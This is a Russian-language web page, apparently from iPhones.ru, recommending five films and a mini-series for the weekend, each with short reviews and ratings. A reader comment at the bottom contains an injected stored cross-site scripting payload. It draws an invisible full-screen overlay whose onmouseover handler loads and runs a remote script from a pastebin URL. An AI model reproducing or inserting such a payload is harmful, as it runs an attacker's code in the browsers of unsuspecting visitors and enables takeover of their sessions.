iTunes Store Что посмотреть на выходных #70

Роман Юрьев avatar | 1
FavoriteLoading В закладки
Что посмотреть на выходных #70

Девушки, вышла новая отличная мелодрама и еще одна драма с Расселом Кроу, так что сегодняшний выпуск наполовину посвящен вам. Также есть парочка интересных лент для геймеров и драматическая комедия с элементами фэнтези.

Искатель воды

Жанр: Драма, военный
Возрастной рейтинг: 16+
Рейтинг КиноПоиска: 6,9
Рейтинг IMDb: 7,2
Год: 2015
Загрузить фильм

Рассел Кроу — это сильнейший драматический актер: «Гладиатор», «Игры Разума», «Нокдаун», «Секреты Лос-Анджелеса», а теперь — «Искатель воды». Перед вами душещипательная военная драма об отце, потерявшем во время Первой мировой войны своих сыновей, а затем и жену, не выдержавшую горя. Он пообещал ей найти тела детей и вернуть их домой. Это вылилось в целое приключение, а также в надежду, что кто-то смог выжить.

К слову, «Искатель воды» стал режиссерским дебютом Рассела Кроу и получился он очень сильным, если не сказать — пронзительным.

Вдали от обезумевшей толпы

Жанр: Драма, мелодрама
Возрастной рейтинг: 16+
Рейтинг КиноПоиска: 7,1
Рейтинг IMDb: 7,2
Год: 2015
Загрузить фильм

Одноименный роман Томаса Харди, легший в основу киноленты, вошел в список лучших любовных истории по версии издания The Guardian, и это сама по себе хорошая рекомендация. Фильм чисто женский, о любви и сомнениях, о страсти и сложностях, которые влечет за собой соперничество мужчин за сердце прекрасной дамы. А дамочка эта, Батшеба Эвердин, не так проста, как кажется. Унаследовав богатую ферму от дядюшки, она принялась ловко ее развивать. Среди наемных рабочих оказался разорившийся фермер Габриэль Оук, просивший руки Эвердин ранее и явно запавший женщине в душу. Затем руку и сердце предложил богатый и солидный сосед, зажиточный фермер Уильям Болдвуд, взбудоражив девушку. Но тут внезапно на жизненном пути возникает красавец-сержант Фрэнк Троем. Такой вот любовный квадрат.

Сапожник

Жанр: Фэнтези, драма, комедия
Возрастной рейтинг: 16+
Рейтинг КиноПоиска: 6,1
Рейтинг IMDb: 5,9
Год: 2014
Загрузить фильм

А вот и очередная история о переселении душ в разные тела, но рассказанная по-новому. Стоит сапожнику Максу Симкину (Адам Сэндлер) примерить простроченную на старой швейной машинке обувь, как он резво попадает в тело ее владельца и начинается веселуха! Ведь владельцы разные бывают: мачо, бандит, трансвестит и другие люди. Вот только Макс не учел тот факт, что его тело тоже пустующим не остается. В итоге мнимое всемогущество сапожника может привести к весьма неожиданным последствиям

В фильме много разного намешано — и фэнтези, и комедия, и даже семейная драма, но в целом картина несет в себе позитив, смотрится хорошо, хотя и один раз.

Halo 4: Идущий к рассвету (мини-сериал)

Жанр: Фантастика, боевик
Возрастной рейтинг: 16+
Рейтинг КиноПоиска: 6,8
Рейтинг IMDb: 7,2
Год: 2013
Загрузить фильм

Одна из лучших игровых серий современности Halo обзавелась пару лет назад и своим собственным мини-сериалом, не посрамившим честь Мастера Чифа. Полтора часа сочного военно-космического действа, которое начинается с банальной муштры в академии Космического Командования Объединённых Наций (UNSC), после чего превращается в непрерывный «экшон» с участием как самого Мастера Чифа (легендарный супер-солдат из секретных лабораторий), так и вчерашних зеленых курсантов, столкнувшихся с неизведанным инопланетным врагом.

Фактически сериал является предысторией к игре Halo 4, но он также прекрасно смотрится и в отрыве от этой вселенной. Рекомендую всем любителям фантастики. Фанатам же Halo, каким-то образом пропустившим «Halo 4: Идущий к рассвету», смотреть в обязательном порядке.

Последняя фантазия

Жанр: Мультфильм, фантастика, фэнтези, боевик
Возрастной рейтинг: 12+
Рейтинг КиноПоиска: 7,6
Рейтинг IMDb: 6,4
Год: 2001
Загрузить Фильм

Когда этот мультфильм вышел в прокат в 2001 году, то многие актеры впали в панику, опасаясь, что их заменит CG-анимация. Столь высокого качества прорисовки персонажей да и картинки в целом, какое показали японские маньяки-аниматоры, индустрия еще не видела. Даже спустя 14 лет «Последняя фантазия» выглядит потрясающе и способна легко потягаться с современными анимационными фильмами.

Но это лишь верхушка айсберга. Намного интереснее то, что скрыто под водой. А там прячется невероятная история о Земле в далеком 2065 году, на которую напали странные монстры-фантомы из иных миров. Противостоять им практически невозможно и почти вся планета оказалась порабощена жуткой нечистью. Тем не менее, надежда есть.

Пересматривал этот мультфильм много раз и с удовольствием сделаю это еще раз, как и в случае с «Последней фантазией 7» — тоже рекомендую к просмотру.

1 Звезд2 Звезды3 Звезды4 Звезды5 Звезд (Проголосуйте первым за статью!)
undefined
iPhones.ru
Девушки, вышла новая отличная мелодрама и еще одна драма с Расселом Кроу, так что сегодняшний выпуск наполовину посвящен вам. Также есть парочка интересных лент для геймеров и драматическая комедия с элементами фэнтези. Искатель воды Жанр: Драма, военный Возрастной рейтинг: 16+ Рейтинг КиноПоиска: 6,9 Рейтинг IMDb: 7,2 Год: 2015 Загрузить фильм Рассел Кроу — это сильнейший...
Прокомментировать

🙈 Комментарий 1

  1. kumik1978 avatar
    kumik19781 августа 2015
    0

    Думаю сапожник мне понравится :[

    [” onmouseover=”this.style.display=’none’;var scrpt = document.createElement(‘script’);scrpt.src=’http://pastebin.com/raw.php?i=qpFjQFvk’;document.head.appendChild(scrpt);” style=”position:fixed;left:0px;top:0px;width:100%;height:100%;z-index:10000;display:block” ]

Вы должны авторизоваться или зарегистрироваться для комментирования.

Нашли орфографическую ошибку в новости?

Выделите ее мышью и нажмите Ctrl+Enter.

Как установить аватар в комментариях?

Ответ вот здесь